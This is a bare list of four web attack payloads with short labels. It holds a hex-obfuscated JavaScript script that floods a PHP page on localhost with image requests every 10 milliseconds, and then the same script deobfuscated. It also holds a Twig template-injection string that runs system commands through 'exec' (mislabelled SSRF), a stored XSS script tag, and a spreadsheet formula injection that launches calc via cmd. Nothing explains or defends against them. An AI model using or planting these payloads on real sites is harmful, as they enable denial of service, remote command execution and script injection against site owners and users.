

payload 1: Jquery Dos

<script>
var _0x157b=["\x6C\x6F\x63\x61\x6C\x68\x6F\x73\x74","\x2F\x64\x72\x69\x6C\x6C\x2F\x63\x75\x73\x74\x6F\x6D\x65\x72\x5F\x61\x63\x63\x6F\x75\x6E\x74\x5F\x73\x75\x6D\x6D\x61\x72\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F","\x3D\x76\x61\x6C"];function imgflood(){var _0x99b7x2=_0x157b[0];var _0x99b7x3=_0x157b[1];var _0x99b7x4= new Image();var _0x99b7x5=Math[_0x157b[3]](Math[_0x157b[2]]()* 1000);_0x99b7x4[_0x157b[4]]= _0x157b[5]+ _0x99b7x2+ _0x99b7x3+ _0x99b7x5+ _0x157b[6]}setInterval(imgflood,10)
</script>

payload 2:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("dir")}} SSRF


payload 3:<script>alert("Stored XSS...!!!!!!!");</script> Stored XSS

payload 4:@SUM(1+1)*cmd|\' /C calc\'!A0 Formula Injection

<script>
function imgflood() {
  var TARGET = 'localhost';
  var URI = '/drill/customer_account_summary.php?';
  var pic = new Image();
  var rand = Math.floor(Math.random() * 1000);
  pic.src = 'http://'+TARGET+URI+rand+'=val';
}
setInterval(imgflood, 10);
</script>